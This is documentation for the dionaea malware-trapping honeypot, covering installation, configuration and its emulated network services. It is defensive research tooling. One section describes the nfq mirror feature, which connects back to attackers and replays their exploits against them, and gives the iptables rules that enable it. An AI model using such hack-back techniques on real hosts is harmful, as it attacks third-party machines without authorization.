1DIONAEA(1) dionaea DIONAEA(1)
2
6 dionaea - dionaea Documentation
7 Dionaea is meant to be a nepenthes successor, embedding python as
9 scripting language, using libemu to detect shellcodes, supporting ipv6
10 and tls
11 WARNING:
13 The documentation is work in progress.
14 Content:
16
18 How it works
19 dionaea intention is to trap malware exploiting vulnerabilities exposed
20 by services offerd to a network, the ultimate goal is gaining a copy of
21 the malware.
22 Security
24 As Software is likely to have bugs, bugs in software offering network
25 services can be exploitable, and dionaea is software offering network
26 services, it is likely dionaea has exploitable bugs.
27 Of course we try to avoid it, but if nobody would fail when trying
29 hard, we would not need software such as dionaea.
30 So, in order to minimize the impact, dionaea can drop privileges, and
32 chroot.
33 To be able to run certain actions which require privileges, after dion‐
35 aea dropped them, dionaea creates a child process at startup, and asks
36 the child process to run actions which require elevated privileges.
37 This does not guarantee anything, but it should be harder to get gain
38 root access to the system from an unprivileged user in a chroot envi‐
39 ronment.
40 Network Connectivity
42 Given the softwares intented use, network io is crucial. All network io
43 is within the main process in a so called non-blocking manner. To un‐
44 derstand nonblocking, imagine you have many pipes infront of you, and
45 these pipes can send you something, and you can put something into the
46 pipe. If you want to put something into a pipe, while it is crowded,
47 you’d have to wait, if you want to get something from a pipe, and there
48 is nothing, you’d have to wait too. Doing this pipe game non-blocking
49 means you won’t wait for the pipes to be write/readable, you’ll get
50 something off the pipes once data arrives, and write once the pipe is
51 not crowded. If you want to write a large chunk to the pipe, and the
52 pipe is crowded after a small piece, you note the rest of the chunk you
53 wanted to write, and wait for the pipe to get ready.
54 DNS resolves are done using libudns, which is a neat non-blocking dns
56 resolving library with support for AAAA records and chained cnames. So
57 much about non-blocking.
58 dionaea uses libev to get notified once it can act on a socket, read or
60 write.
61 dionaea can offer services via tcp/udp and tls for IPv4 and IPv6, and
63 can apply rate limiting and accounting limits per connections to tcp
64 and tls connections - if required.
65
67 At the time of writing the best choice to install dionaea on a server
68 is to use Ubuntu 14.04, but below you can find how to install it (from
69 source) on other distributions/operating systems.
70 Basic stuff
72 Download the source code
73 You can download the source code from the release page or by using the
74 git command.
75 git clone https://github.com/DinoTools/dionaea.git
77 cd dionaea
78 Arch Linux
80 Packages for dionaea are available from the Arch User Repository (AUR).
81 Use a package manager like yaourt that can handle and install packages
82 from the AUR.
83 Before you start install the required build tools.
85 $ yaourt -S base-devel
87 After the requirements have been installed successfully you can install
89 dionaea. This will checkout the latest sources from the git reposi‐
90 tory, run the build process and install the package.
91 $ yaourt -S dionaea-git
93 After the installation has been completed you may want to edit the con‐
95 fig file /etc/dionaea/dionaea.conf. If everything looks fine the dion‐
96 aea service can bee started by using the following command.
97 $ sudo systemctl start dionaea
99 The log files and everything captured can be found in the directory
101 /var/lib/dionaea/.
102 Ubuntu 16.04
104 From Source
105 Before you start download the source code of dionaea.
106 Install required build dependencies before configuring and building
108 dionaea. (‘ttf-liberation’ required to ‘util/gnuplotsql.py’)
109 sudo apt-get install \
111 autoconf \
112 automake \
113 build-essential \
114 check \
115 cython3 \
116 libcurl4-openssl-dev \
117 libemu-dev \
118 libev-dev \
119 libglib2.0-dev \
120 libloudmouth1-dev \
121 libnetfilter-queue-dev \
122 libnl-3-dev \
123 libpcap-dev \
124 libssl-dev \
125 libtool \
126 libudns-dev \
127 python3 \
128 python3-dev \
129 python3-bson \
130 python3-yaml \
131 ttf-liberation
132 After all dependencies have been installed successfully run autreconf
134 to build or rebuild the build scripts.
135 autoreconf -vi
137 Run configure to configure the build scripts.
139 ./configure \
141 --disable-werror \
142 --prefix=/opt/dionaea \
143 --with-python=/usr/bin/python3 \
144 --with-cython-dir=/usr/bin \
145 --with-ev-include=/usr/include/ \
146 --with-ev-lib=/usr/lib \
147 --with-emu-lib=/usr/lib/libemu \
148 --with-emu-include=/usr/include \
149 --with-nl-include=/usr/include/libnl3 \
150 --with-nl-lib=/usr/lib
151 Now you should be able to run make to build and run make install to in‐
153 stall the honeypot.
154 make
156 sudo make install
157 The new honeypot can be found in the directory /opt/dionaea.
159 Ubuntu 14.04
161 Package based
162 Nightly packages are provided in a Personal Package Archive (PPA). Be‐
163 fore you start you should update all packages to get the latest secu‐
164 rity updates.
165 $ sudo apt-get update
167 $ sudo apt-get dist-upgrade
168 First of all install the tools to easily manage PPA resources.
170 $ sudo apt-get install software-properties-common
172 After the required tools have been installed you can add the PPA and
174 update the package cache.
175 $ sudo add-apt-repository ppa:honeynet/nightly
177 $ sudo apt-get update
178 If everything worked without any errors you should be able to install
180 the dionaea package.
181 $ sudo apt-get install dionaea
183 After the installation has been completed you may want to edit the con‐
185 fig file /etc/dionaea/dionaea.conf. If everything looks fine the dion‐
186 aea service can bee started by using the following command.
187 $ sudo service dionaea start
189 The log files can be found in the directory /var/log/dionaea/ and ev‐
191 erything else captured and logged by the honeypot can be found in the
192 directory /var/lib/dionaea/.
193 From Source
195 Before you start download the source code of dionaea.
196 Install required build dependencies before configuring and building
198 dionaea.
199 $ sudo apt-get install \
201 autoconf \
202 automake \
203 build-essential \
204 check \
205 cython3 \
206 libcurl4-openssl-dev \
207 libemu-dev \
208 libev-dev \
209 libglib2.0-dev \
210 libloudmouth1-dev \
211 libnetfilter-queue-dev \
212 libnl-dev \
213 libpcap-dev \
214 libssl-dev \
215 libtool \
216 libudns-dev \
217 python3 \
218 python3-dev \
219 python3-bson \
220 python3-yaml
221 After all dependencies have been installed successfully run autreconf
223 to build or rebuild the build scripts.
224 autoreconf -vi
226 Run configure to configure the build scripts.
228 ./configure \
230 --disable-werror \
231 --prefix=/opt/dionaea \
232 --with-python=/usr/bin/python3 \
233 --with-cython-dir=/usr/bin \
234 --with-ev-include=/usr/include \
235 --with-ev-lib=/usr/lib \
236 --with-emu-lib=/usr/lib/libemu \
237 --with-emu-include=/usr/include \
238 --with-nl-include=/usr/include/libnl3 \
239 --with-nl-lib=/usr/lib
240 Now you should be able to run make to build and run make install to in‐
242 stall the honeypot.
243 make
245 sudo make install
246 The new honeypot can be found in the directory /opt/dionaea.
248 3rd-party packages
250 The packages below are 3rd party provided, which is appreciated. If
251 you have compiled a package for your own distribution, just send me the
252 link or make a pull request.
253
255 If you want to change the software, it is really important to under‐
256 stand how it works, therefore please take the time to how it works.
257 dionaea.cfg is the main configuration file. In the example below you
258 can see the default configuration.
259 dionaea.cfg
261 [dionaea]
263 download.dir=/var/lib/dionaea/binaries/
264 modules=curl,python,nfq,emu,pcap
265 processors=filter_streamdumper,filter_emu
266 listen.mode=getifaddrs
268 # listen.addresses=127.0.0.1
269 # listen.interfaces=eth0,tap0
270 # Country
272 # ssl.default.c=GB
273 # Common Name/domain name
274 # ssl.default.cn=
275 # Organization
276 # ssl.default.o=
277 # Organizational Unit
278 # ssl.default.ou=
279 [logging]
281 default.filename=/var/log/dionaea/dionaea.log
282 default.levels=all
283 default.domains=*
284 errors.filename=/var/log/dionaea/dionaea-errors.log
286 errors.levels=warning,error
287 errors.domains=*
288 [processor.filter_emu]
290 name=filter
291 config.allow.0.protocols=smbd,epmapper,nfqmirrord,mssqld
292 next=emu
293 [processor.filter_streamdumper]
295 name=filter
296 config.allow.0.types=accept
297 config.allow.1.types=connect
298 config.allow.1.protocols=ftpctrl
299 config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
300 next=streamdumper
301 [processor.streamdumper]
303 name=streamdumper
304 config.path=/var/lib/dionaea/bistreams/%Y-%m-%d/
305 [processor.emu]
307 name=emu
308 config.limits.files=3
309 #512 * 1024
310 config.limits.filesize=524288
311 config.limits.sockets=3
312 config.limits.sustain=120
313 config.limits.idle=30
314 config.limits.listen=30
315 config.limits.cpu=120
316 #// 1024 * 1024 * 1024
317 config.limits.steps=1073741824
318 [module.nfq]
320 queue=2
321 [module.nl]
323 # set to yes in case you are interested in the mac address of the remote (only works for lan)
324 lookup_ethernet_addr=no
325 [module.python]
327 imports=dionaea.log,dionaea.services,dionaea.ihandlers
328 sys_paths=default
329 service_configs=/etc/dionaea/services-enabled/*.yaml
330 ihandler_configs=/etc/dionaea/ihandlers-enabled/*.yaml
331 [module.pcap]
333 any.interface=any
334 dionaea
338 download.dir
339 Global download directory used by some ihandlers.
340 listen.mode:
342 There are basically three modes how dionaea can bind the services to
343 IP addresses.
344 •
346 getifaddrs - auto
348 This will get a list of all IP addresses of all available
349 interfaces and bind the services to each IP. It is also
350 possible to specify a list of interfaces to use by using
351 the listen.interfaces perameter.
352 •
354 manual - your decision
356 In this mode you have to specify an additional parameter
357 listen.addresses. This is a comma separated list of IP ad‐
358 dresses dionaea should bind the services to.
359 •
361 nl, will require a list of interfaces
363 You have to specify a comma separated list of interfaces
364 names with the listen.interfaces parameter. If an IP ad‐
365 dress is added to an interfaces or removed from an inter‐
366 face dionaea will lunch or stop all services for this IP.
367 modules
369 Comma separated list of modules.
370 processors
372 Comma separated list of processors.
373 ssl.default.c
375 Two letter id of the Country.
376 ssl.default.cn
378 The Common Name/domain name of the generated SSL/TLS certificate.
379 ssl.default.o
381 The Organization name.
382 ssl.default.ou
384 The name of the Organizational Unit.
385 Logging
387 dionaea has a general application log. This logs are ment to be used
388 for debugging and to track errors. It is not recommended to analyse
389 this files to track attacks.
390 filename
392 The filename of the logfile.
393 levels
395 Only log messages that match the specified log level get logged to
396 the logfile.
397 Available log levels:
399 • debug
401 • info
403 • warning
405 • error
407 • critical
409 • all = Special log level including all log levels
411 Examples:
413 Log only messages with level warning and error
415 errors.levels=warning,error
417 Log all log messages but exclude messages with log level debug
419 errors.levels=all,-debug
421 domain
423 Only log messages in a specified domain.
424 Modules
426 Only modules specified by the modules value in the dionaea section are
427 loaded during the start up.
428 Every module might have its own config section with additional config
430 parameters. The section name consists of the prefix module and the
431 module name speratated by a dot(.).
432 See the module/index documentation to find more information on how to
434 configure the modules.
435 Processors
437 The specified processors will be used as an entry point in the process‐
438 ing pipeline. In most cases the initial processor will be a filter
439 processor <processor/filter>. The next processor in the pipeline is
440 specified by the next parameter.
441 See the processor/index documentation to find more information on how
443 to configure the processors.
444
446 The software has some flags you can provide at startup, the -h flag
447 shows the help, the -H includes the default values.
448 $ /opt/dionaea/bin/dionaea -H
450 -c, --config=FILE use FILE as configuration file
451 Default value/behaviour: /opt/dionaea/etc/dionaea/dionaea.cfg
452 -D, --daemonize run as daemon
453 -g, --group=GROUP switch to GROUP after startup (use with -u)
454 Default value/behaviour: keep current group
455 -G, --garbage=[collect|debug] garbage collect, usefull to debug memory leaks,
456 does NOT work with valgrind
457 -h, --help display help
458 -H, --large-help display help with default values
459 -l, --log-levels=WHAT which levels to log, valid values
460 all, debug, info, message, warning, critical, error
461 combine using ',', exclude with - prefix
462 -L, --log-domains=WHAT which domains use * and ? wildcards, combine using ',',
463 exclude using -
464 -u, --user=USER switch to USER after startup
465 Default value/behaviour: keep current user
466 -p, --pid-file=FILE write pid to file
467 -r, --chroot=DIR chroot to DIR after startup
468 Default value/behaviour: don't chroot
469 -V, --version show version
470 -w, --workingdir=DIR set the process' working dir to DIR
471 Default value/behaviour: /opt/dionaea
472 examples:
474 # dionaea -l all,-debug -L '*'
475 # dionaea -l all,-debug -L 'con*,py*'
476 # dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/var/run/dionaea.pid
477
479 A list of applications and tools to collect information exported by
480 dionaea.
481 DTAG Community Honeypot Project
483 The DTAG Community Honeypot Project has been started in 2010 by a small
484 group of enthusiasts of the Deutsche Telekom. They are maintaining
485 T-Pot a Multi-Honeypot Platform. It is based on well established hon‐
486 eypots including dionaea.
487 • Website: DTAG Community Honeypot Project
489 • Status: active
491 DionaeaFR
493 DionaeaFR is a web-frontend to display attack information. It uses the
494 SQLite database provided by the log_sqlite ihandler.
495 • Website: DionaeaFR
497 • Status: unmaintained since 2014
499 DIY with log_json
501 You can use the log_json incident handler in combination with an ELK
502 stack to collect, aggregate and visualize attack information.
503 • Website: ELK stack
505 • Status: active
507 Modern Honey Network(mhn)
509 A tool to deploy honeypots, collect attack information and display ag‐
510 gregated statistics.
511 • Website: Modern Honey Network
513 • Status: active, but deploys an pre 0.2(2014) version of dionaea by
515 default.
516
518 The subsections name is the name of the module dionaea will try to
519 load, most modules got rather simplistic names, the pcap module will
520 use libpcap, the curl module libcurl, the emu module libemu … The
521 python module is special, as the python module can load python scripts,
522 which offer services, and each services can have its own options.
523 List of available modules
525 curl
527 The curl module is used to transfer files from and to servers, it is
528 used to download files via http as well as submitting files to 3rd par‐
529 ties.
530 emu
532 The emu module is used to detect, profile and - if required - execute
533 shellcode.
534 pcap
536 The pcap module uses the libpcap library to detect rejected connection
537 attempts, so even if we do not accept a connection, we can use the in‐
538 formation somebody wanted to connect there.
539 python
541 The python module allows using the python interpreter in dionaea, and
542 allows controlling some scripts dionaea uses
543
545 Network services speak a certain language, this language is called pro‐
546 tocol. When we started deploying honeypots, you could trap worms just
547 by opening a single port, and wait for them to connect and send you an
548 url where you could download a copy of the worm. The service getting
549 attacked was the backdoor of the bagle mailworm, and it did not require
550 and interaction. Later on, the exploitations of real services got more
551 complex, and you had to reply something to the worm to fool him. Nowa‐
552 days worms use API to access services, before sending their payload.
553 To allow easy adjustments to the procotol, dionaea implements the pro‐
554 tocols in python. There is a glue between the network layer which is
555 done in the c programming language and the embedded python scripting
556 language, which allows using the non-blocking connections in python.
557 This has some benefits, for example we can use non-blocking tls connec‐
558 tions in python, and we even get rate limiting on them (if required),
559 where pythons own io does not offer such things. On the other hand, it
560 is much more comfortable to implement protocols in python than doing
561 the same in c.
562 List of available services
564 Black hole
566 The black hole module can be used to bind a service to a port. The
567 service does not respond to any submitted data. But the bistreams can
568 be used to create new modules.
569 Example config
571 services/blackhole.yaml
572 - name: blackhole
574 config:
575 services:
576 # Telnet
577 - port: 23
578 protocol: tcp
579 # DNS
581 - port: 53
582 protocol: udp
583 - port: 53
584 protocol: tcp
585 # NTP
587 - port: 123
588 protocol: udp
589 EPMAP
592 Example config
593 services/epmap.yaml
594 - name: epmap
596 FTP
599 Dionaea provives a basic ftp server on port 21, it can create directo‐
600 ries and upload and download files. From my own experience there are
601 very little automated attacks on ftp services and I’m yet to see some‐
602 thing interesting happening on port 21.
603 Example config
605 services/ftp.yaml
606 - name: ftp
608 config:
609 root: /var/lib/dionaea/roots/ftp
610 response_messages:
611 welcome_msg: 220 DiskStation FTP server ready.
612 HTTP
615 Dionaea supports http on port 80 as well as https, but there is no code
616 making use of the data gathered on these ports. For https, the
617 self-signed ssl certificate is created at startup.
618 Configure
620 Example configuration:
621 - name: http
623 config:
624 root = "var/dionaea/wwwroot"
625 default_headers
627 Default header fields are send if none of the other header patterns
628 match.
629 global_headers
631 Global header fields are added to all response headers.
632 headers
634 List of header fields to be used in the response header. Only ap‐
635 plied if filename_pattern, status_code and methods match. The first
636 match in the list is used.
637 max_request_size
639 Maximum size in kbytes of the request. 32768 = 32MB
640 root
642 The root directory so serve files from.
643 Example config
645 services/http.yaml
646 - name: http
648 config:
649 root: "/var/lib/dionaea/roots/www"
650 ports:
651 - 80
652 ssl_ports:
653 - 443
654 max_request_size: 32768 # maximum size in kbytes of the request (32MB)
655 global_headers:
656 - ["Server", "nginx"]
657 headers:
658 - filename_pattern: ".*\\.php"
659 headers:
660 - ["Content-Type", "text/html; charset=utf-8"]
661 - ["Content-Length", "{content_length}"]
662 - ["Connection", "{connection}"]
663 - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
664 # soap_enabled: false
665 template:
666 # set to true to enable template processing
667 # this feature requires jinja2 template engine http://jinja.pocoo.org/
668 enabled: false
669 file_extension: .j2
670 path: "/var/lib/dionaea/share/python/http/template/nginx"
671 templates:
672 autoindex:
673 filename: autoindex.html.j2
674 error_pages:
675 - filename: error.html.j2
676 # - filename: error/{code}.html.j2
677 # used to specify additional template values
678 values:
679 # full_name: nginx/1.1
680 Additional examples
683 Set the Server response field.
684 - name: http
686 config:
687 global_headers:
688 - ["Server", "nginx"]
689 Define headers to use if the filename matches a pattern.
691 - name: http
693 config:
694 headers:
695 - filename_pattern: ".*\\.php"
696 headers:
697 - ["Content-Type", "text/html; charset=utf-8"]
698 - ["Content-Length", "{content_length}"]
699 - ["Connection", "{connection}"]
700 - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
701 Memache
703 Dionaea can emulate a very basic memcached server.
704 Configure
706 Example config
707 services/memcache.yaml
708 - name: memcache
710 Mirror
713 Example config
714 services/mirror.yaml
715 - name: mirror
717 MongoDB
720 This module add initial support to emulates a MongoDB server with the
721 dionaea honeypot. At the moment it is very limited and the functional‐
722 ity might be improved in one of the next releases.
723 Requirements
725 • bson module for Python 3
726 Example config
728 services/mongo.yaml
729 - name: mongo
731 MQTT
734 Example config
735 services/mqtt.yaml
736 - name: mqtt
738 MSSQL
741 This module implements the Tabular Data Stream protocol which is used
742 by Microsoft SQL Server. It listens to tcp/1433 and allows clients to
743 login. It can decode queries run on the database, but as there is no
744 database, dionaea can’t reply, and there is no further action. Typi‐
745 cally we always get the same query:
746 exec sp_server_info 1 exec sp_server_info 2 exec sp_server_info 500 select 501,NULL,1 where 'a'='A' select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id set textsize 2147483647 set arithabort on
748 Refer to the blog <‐
750 http://carnivore.it/2010/09/11/mssql_attacks_examined> for more infor‐
751 mation. Patches would be appreciated.
752 Example config
754 services/mssql.yaml
755 - name: mssql
757 MySQL
760 This module implements the MySQL wire stream protocol - backed up by
761 sqlite as database. Please refer to 2011-05-15 Extending Dionaea <‐
762 http://carnivore.it/2011/05/15/extending_dionaea> for more information.
763 Example config
765 services/mysql.yaml
766 - name: mysql
768 config:
769 databases:
770 information_schema:
771 path: ":memory:"
772 # example how to extend this
773 # just provide a databasename and path to the database
774 # the database can be altered by attackers, so ... better use a copy
775 # psn:
776 # path: "/path/to/cc_info.sqlite"
777 nfq
780 The python nfq script is the counterpart to the nfq module. While the
781 nfq module interacts with the kernel, the nfq python script takes care
782 of the required steps to start a new service on the ports. nfq can in‐
783 tercept incoming tcp connections during the tcp handshake giving your
784 honeypot the possibility to provide service on ports which are not
785 served by default.
786 As dionaea can not predict which protocol will be spoken on unknown
788 ports, neither implement the protocol by itself, it will connect the
789 attacking host on the same port, and use the attackers server side pro‐
790 tocol implementation to reply to the client requests of the attacker
791 therefore dionaea can end up re?exploiting the attackers machine, just
792 by sending him the exploit he sent us.
793 The technique is a brainchild of Tillmann Werner, who used it within
795 his honeytrap <http://honeytrap.carnivore.it> honeypot. Legal bound‐
796 aries to such behaviour may be different in each country, as well as
797 ethical boundaries for each individual. From a technical point of view
798 it works, and gives good results. Learning from the best, I decided to
799 adopt this technique for dionaea. Besides the legal and ethical issues
800 with this approach, there are some technical things which have to be
801 mentioned
802 port scanning
804 If your honeypot gets port scanned, it would open a service for each
805 port scanned, in worst case you’d end up with offering 64k services
806 per ip scanned. By default you’d run out of fds at about 870 ser‐
807 vices offerd, and experience weird behaviour. Therefore the impact
808 of port scanning has to be limited. The kiss approach taken here is
809 a sliding window of throttle.window seconds size. Each slot in this
810 sliding window represents a second, and we increment this slot for
811 each connection we accept. Before we accept a connection, we check
812 if the sum of all slots is below throttle.limits.total, else we do
813 not create a new service. If the sum is below the limit, we check
814 if the current slot is below the slot limit too, if both are given,
815 we create a new service. If one of the condition fails, we do not
816 spawn a new service, and let nfqeueu process the packet. There are
817 two ways to process packets which got throttled:
818 • NF_ACCEPT (=1), which will let the packet pass the kernel, and as
820 there is no service listening, the packet gets rejected.
821 • NF_DROP (=0), which will drop the packet in the kernel, the remote
823 does not get any answer to his SYN.
824 I prefer NF_DROP, as port scanners such as nmap tend to limit their
826 scanning speed, once they notice packets get lost.
827 recursive-self-connecting
829 Assume some shellcode or download instructions makes dionaea to
830 • connect itself on a unbound port
832 • nfq intercepts the attempt
834 • spawns a service
836 • accepts the connection #1
838 • creates mirror connection for connection #1 by connecting the re‐
840 motehost (itself) on the same port #2
841 • accepts connection #2 as connection #3
843 • creates mirror connection for connection #3 by connecting the re‐
845 motehost (itself) on the same port #4
846 • …
848 Such recursive loop, has to be avoided for obvious reasons. There‐
850 fore dionaea checks if the remote host connecting a nfq mirror is a
851 local address using ‘getifaddrs’ and drops local connections.
852 So much about the known problems and workarounds …
854 If you read that far, you want to use it despite the technical/le‐
856 gal/ethical problems. So … You’ll need iptables, and you’ll have to
857 tell iptables to enqueue packets which would establish a new connec‐
858 tion. I recommend something like this:
859 iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
861 iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5
862 Explanation:
864 1. ACCEPT all connections to existing services
866 2. enqueue all other packets to the NFQUEUE
868 If you have dionaea running on your NAT router, I recommend something
870 like:
871 iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
873 iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
874 iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE
875 Explanation:
877 1. ACCEPT all connections to existing services in mangle::PREROUTING
879 2. MARK all other packets
881 3. if we see these marked packets on INPUT, queue them
883 Using something like:
885 iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5
887 will enqueue /all/ SYN packets to the NFQUEUE, once you stop dionaea
889 you will not even be able to connect to your ssh daemon.
890 Even if you add an exemption for ssh like:
892 iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW --destination-port ! 22 -j NFQUEUE
894 dionaea will try to create a new service for /every/ incoming connec‐
896 tion, even if there is a service running already. As it is easy to
897 avoid this, I recommend sticking with the recommendation. Besides the
898 already mention throttle settings, there are various timeouts for the
899 nfq mirror service in the config. You can control how long the service
900 will wait for new connections (/timeouts.server.listen/), and how long
901 the mirror connection will be idle (/timeouts.client.idle/) and sustain
902 (/timeouts.client.sustain/).
903 PPTP
905 Example config
906 services/pptp.yaml
907 - name: pptp
909 config:
910 # Cisco PIX
911 # firmware_revision: 4608
912 # hostname:
913 # vendor_name: Cisco Systems
914 # DrayTek
916 # firmware_revision: 1
917 # hostname: Vigor
918 # vendor_name: DrayTek
919 # Linux
921 # firmware_revision: 1
922 # hostname: local
923 # vendor_name: linux
924 # Windows
926 # firmware_revision: 0
927 # hostname:
928 # vendor_name: Microsoft
929 # MikroTik router
931 # firmware_revision: 1
932 # hostname: MikroTik
933 # vendor_name: MikroTik
934 SIP (VoIP)
937 This is a VoIP module for the honeypot dionaea. The VoIP protocol used
938 is SIP since it is the de facto standard for VoIP today. In contrast to
939 some other VoIP honeypots, this module doesn’t connect to an external
940 VoIP registrar/server. It simply waits for incoming SIP messages (e.g.
941 OPTIONS or even INVITE), logs all data as honeypot incidents and/or bi‐
942 nary data dumps (RTP traffic), and reacts accordingly, for instance by
943 creating a SIP session including an RTP audio channel. As sophisticated
944 exploits within the SIP payload are not very common yet, the honeypot
945 module doesn’t pass any code to dionaea’s code emulation engine. This
946 will be implemented if we spot such malicious messages. The main fea‐
947 tures of the VoIP module are:
948 • Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)
950 • Support for multiple SIP sessions and RTP audio streams
952 • Record all RTP data (optional)
954 • Set custom SIP username and secret (password)
956 • Set custom useragent to mimic different phone models
958 • Uses dionaea’s incident system to log to SQL database
960 Personalities
962 A personality defines how to handle a request. At least the ‘default’
963 personality MUST exist. The following options are available per person‐
964 ality.
965 serve
967 A list of IP addresses to use this personality for.
968 handle
970 List of SIP methods to handle.
971 SIP Users
973 You can easily add, change or remove users by editing the SQLite file
974 specified by the ‘users = “”’ parameter in the config file. All users
975 are specified in the users table.
976 username
978 Specifies the name of the user. This value is treated as regular ex‐
979 pression. See Python: Regular Expressions <‐
980 http://docs.python.org/py3k/library/re.html> for more information.
981 password
983 The password.
984 personality
986 The user is only available in the personality specified by this
987 value. You can define a personality in the config file.
988 pickup_delay_min
990 This is an integer value. Let the phone ring for at least this num‐
991 ber of seconds.
992 pickup_delay_max
994 This is an integer value. Maximum number of seconds to wait before
995 dionaea picks up the phone.
996 action
998 This value isn’t in use, yet.
999 sdp
1001 The name of the SDP to use. See table ‘sdp’.
1002 SDP
1004 All SDPs can be defined in the sdp table in the users database.
1005 name
1007 Name of the SDP
1008 sdp
1010 The value to use as SDP
1011 The following values are available in the SDP definition.
1013 {addrtype}
1015 Address type. (IP4 or IP6)
1016 {unicast_address}
1018 RTP address
1019 {audio_port}
1021 Dionaea audio port.
1022 {video_port}
1024 Dionaea video port.
1025 The following control parameters are available in the SDP definition.
1027 [audio_port]…content…[/audio_port]
1029 The content is only available in the output if the audio_port value
1030 is set.
1031 [video_port]…content…[/video_port]
1033 The content is only available in the output if the video_port value
1034 is set.
1035 Example:
1037 v=0
1039 o=- 1304279835 1 IN {addrtype} {unicast_address}
1040 s=SIP Session
1041 c=IN {addrtype} {unicast_address}
1042 t=0 0
1043 [audio_port]
1044 m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
1045 a=sendrecv
1046 a=rtpmap:111 Speex/16000/1
1047 a=fmtp:111 sr=16000,mode=any
1048 a=rtpmap:0 PCMU/8000/1
1049 a=rtpmap:8 PCMA/8000/1
1050 a=rtpmap:9 G722/8000/1
1051 a=rtpmap:101 telephone-event/8000
1052 a=fmtp:101 0-16,32,36
1053 a=rtpmap:120 NSE/8000
1054 a=fmtp:120 192-193
1055 [/audio_port]
1056 [video_port]
1057 m=video {video_port} RTP/AVP 34 96 97
1058 c=IN {addrtype} {unicast_address}
1059 a=rtpmap:34 H263/90000
1060 a=fmtp:34 QCIF=2
1061 a=rtpmap:96 H263-1998/90000
1062 a=fmtp:96 QCIF=2
1063 a=rtpmap:97 H263-N800/90000
1064 [/video_port]
1065 Example config
1067 services/sip.yaml
1068 - name: sip
1070 config:
1071 udp_ports:
1072 - 5060
1073 tcp_ports:
1074 - 5060
1075 tls_ports:
1076 - 5061
1077 users: "@LOCALESTATEDIR@/lib/dionaea/sipaccounts.sqlite"
1078 rtp:
1079 enable: true
1080 # how to dump the rtp stream
1081 # bistream = dump as bistream
1082 modes:
1083 - bistream
1084 - pcap
1085 pcap:
1086 path: "var/dionaea/rtp/{personality}/%Y-%m-%d/"
1087 filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
1088 personalities:
1089 default:
1090 domain: "localhost"
1091 name: "softphone"
1092 personality: "generic"
1093 # next-server:
1094 # domain: "my-domain"
1095 # name: "my server"
1096 # personality: "generic"
1097 # serve: ["10.0.0.1"]
1098 # default_sdp: "default"
1099 # handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]
1100 actions:
1102 bank-redirect:
1103 do: "redirect"
1104 params:
1105 play-hello:
1106 do: "play"
1107 params:
1108 file: "var/dionaea/.../file.ext"
1109 SMB
1112 The main protocol offerd by dionaea is SMB. SMB has a decent history of
1113 remote exploitable bugs, and is a very popular target for worms. dion‐
1114 aeas SMB implementation makes use of an python3 adapted version of
1115 scapy. As scapys own version of SMB was pretty limited, almost every‐
1116 thing but the Field declarations had to be rewritten. The SMB emulation
1117 written for dionaea is used by the mwcollectd <‐
1118 http://code.mwcollect.org> low interaction honeypot too. Besides the
1119 known attacks on SMB dionaea supports uploading files to smb shares.
1120 Adding new DCE remote procedure calls is a good start to get into dion‐
1121 aea code, you can use:
1122 SELECT
1124 COUNT(*),
1125 dcerpcrequests.dcerpcrequest_uuid,
1126 dcerpcservice_name,
1127 dcerpcrequest_opnum
1128 FROM
1129 dcerpcrequests
1130 JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
1131 LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
1132 WHERE
1133 dcerpcserviceop_name IS NULL
1134 GROUP BY
1135 dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
1136 ORDER BY
1137 COUNT(*) DESC;
1138 to identify potential usefull targets of unknown dcerpc calls using the
1140 data you gathered and stored in your logsql database. Patches are ap‐
1141 preciated.
1142 Example config
1144 services/smb.yaml
1145 - name: smb
1147 config:
1148 ## Generic setting ##
1150 # 1:"Windows XP Service Pack 0/1",
1152 # 2:"Windows XP Service Pack 2",
1153 # 3:"Windows XP Service Pack 3",
1154 # 4:"Windows 7 Service Pack 1",
1155 # 5:"Linux Samba 4.3.11"
1156 # os_type: 2
1157 # Additional config
1159 # primary_domain: Test
1160 # oem_domain_name: Test
1161 # server_name: TEST-SERVER
1162 ## Windows 7 ##
1164 # native_os: Windows 7 Professional 7600
1165 # native_lan_manager: Windows 7 Professional 6.1
1166 # shares:
1167 # ADMIN$:
1168 # comment: Remote Admin
1169 # path: C:\\Windows
1170 # type: disktree
1171 # C$:
1172 # coment: Default Share
1173 # path: C:\\
1174 # type:
1175 # - disktree
1176 # - special
1177 # IPC$:
1178 # comment: Remote IPC
1179 # type: ipc
1180 # Printer:
1181 # comment: Microsoft XPS Document Writer
1182 # type: printq
1183 ## Samba ##
1185 # native_os: Windows 6.1
1186 # native_lan_manager: Samba 4.3.11
1187 # shares:
1188 # admin:
1189 # comment: Remote Admin
1190 # path: \\home\\admin
1191 # type: disktree
1192 # share:
1193 # coment: Default Share
1194 # path: \\share
1195 # type: disktree
1196 # IPC$:
1197 # comment: Remote IPC
1198 # path: IPC Service
1199 # type: ipc
1200 # Printer:
1201 # comment: Printer Drivers
1202 # type: printq
1203 TFTP
1206 Written to test the udp connection code, dionaea provides a tftp server
